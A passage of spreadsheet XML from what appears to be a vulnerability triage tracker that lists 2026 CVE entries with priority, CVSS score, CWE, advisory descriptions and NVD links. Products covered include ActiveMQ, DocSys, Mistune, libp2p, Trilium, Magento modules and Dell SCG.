          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in TopicRegion in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All on all platforms.
An authenticated client can spoof clientId when removing a durable topic subscription.
This issue affects Apache ActiveMQ Broker: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ All: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ: before 5.19.11, from 6.0.0 before 6.3.2.
Users are recommended to upgrade to version 6.3.2 or 5.19.11 which fixes the issue.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74761</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75328</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>In DocSys-master V2.02.85, the downloadDocEx interface in src/com/DocSystem/controller/DocController.java has an arbitrary file read vulnerability:</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75328</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75368</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>A stack overflow in the loadRawData function of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted ECSS TC message.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75368</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75371</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>An integer handling flaw in the cobs_decode function of SpaceDot AcubeSAT OBC software commit eaf90ec allows physically-proximate attackers with UART access to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75371</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75413</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>DocSys V2.02.80 is vulnerable to Any File Download. An attacker does not need to go through authentication to utilize the downloadDocEx.do interface and download any file via the parameter targetPath.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75413</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75438</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Open5GS v2.7.7 allows a remote attacker to cause a denial of service via the ogs_sbi_time_parse() function</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75438</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76098</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>Mistune is a Python Markdown parser with renderers and plugins. Versions 3.3.0 through 3.3.2 are vulnerable to DoS through deeply nested tokens. HTML rendering creates deeply nested emphasis tokens from consecutive asterisk characters, and recursive rendering in HTMLRenderer.render_token() can exceed Python's recursion limit and raise RecursionError, allowing crafted Markdown to crash a parsing process. This issue is fixed in version 3.3.3</t>
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76098</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76905</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.10.0 until 0.141.0, openapi3filter.convertParseError in openapi3filter/validation_error_encoder.go dereferences e.Parameter.In without checking whether e.Parameter is nil. A malformed non-string scalar field in a multipart/form-data request body produces a nested ParseError with a nil RequestError.Parameter, and applications that render the validation error through openapi3filter.ConvertErrors or ValidationErrorEncoder panic. An unauthenticated client can repeatedly send such requests to deny service when the application lacks a recovery boundary. JSON request bodies and applications that do not use these error-rendering helpers are not affected. This issue is fixed in version 0.141.0.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76905</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77384</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 4.2.9, the reservation refresh path in reservation-store.ts reuses the same retimeableSignal but unconditionally registers another abort listener on every refresh. As a result, a remote peer can repeatedly send valid RESERVE requests for the same reservation, causing unbounded listener and closure growth in @libp2p/circuit-relay-v2 relay servers and leading to denial of service. This issue is fixed in version 4.2.9.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77384</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77438</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the public share-search endpoint does not enforce the per-note shareCredentials and shareHiddenFromTree controls, allowing an unauthenticated visitor to read the titles, tree paths, and content of protected shared notes. The endpoint authorizes only the ancestor note supplied in the request and then runs a full-text search across the entire published subtree, returning each matching note's title, share identifier, and hierarchical path without re-checking whether that individual note requires a share password or is hidden from the navigation tree. Because the search matches note content, an attacker can enumerate protected notes and use the endpoint as a boolean oracle that confirms arbitrary substrings, recovering the full contents of notes that should be gated behind a password. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77438</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77465</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77465</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78490</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to client-side request forgery.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78490</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78543</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote attacker to cause a denial of service due to an infinite loop.</t>
        </is>
      </c>
      <c r="S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78543</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79323</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr">
        <is>
          <t>mageplaza:magefan_blog</t>
        </is>
      </c>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in the blogComments GraphQL query in Magefan Blog GraphQL for Magento 2 (magefan/module-blog-graph-ql) through 2.2.1 allows remote unauthenticated attackers to obtain blog commenter email addresses and internal customer and admin identifiers via a POST request to /graphql.</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79323</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79324</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr">
        <is>
          <t>mageplaza:gdpr</t>
        </is>
      </c>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in the Address Delete controller in Mageplaza GDPR for Magento 2 (mageplaza/module-gdpr) through 4.2.9 allows remote unauthenticated attackers to delete any customer's saved address, and to erase all stored addresses by iterating the address id, via a GET request to /customer/address/delete/id/{id}. The controller extends the legacy Action class instead of AbstractAccount, so no authentication, ownership or form key check is enforced.</t>
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79324</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79390</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>Trueview TI8161 6.0.23.4 is vulnerable to information disclosure due to the transmission of MQTT communications in plaintext over TCP port 1883. An unauthenticated attacker with access to the same network segment can intercept MQTT traffic and obtain sensitive device information and operational data, including device identifiers, message metadata, and control-related information.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79390</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R517"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elevation of privileges.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79734</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
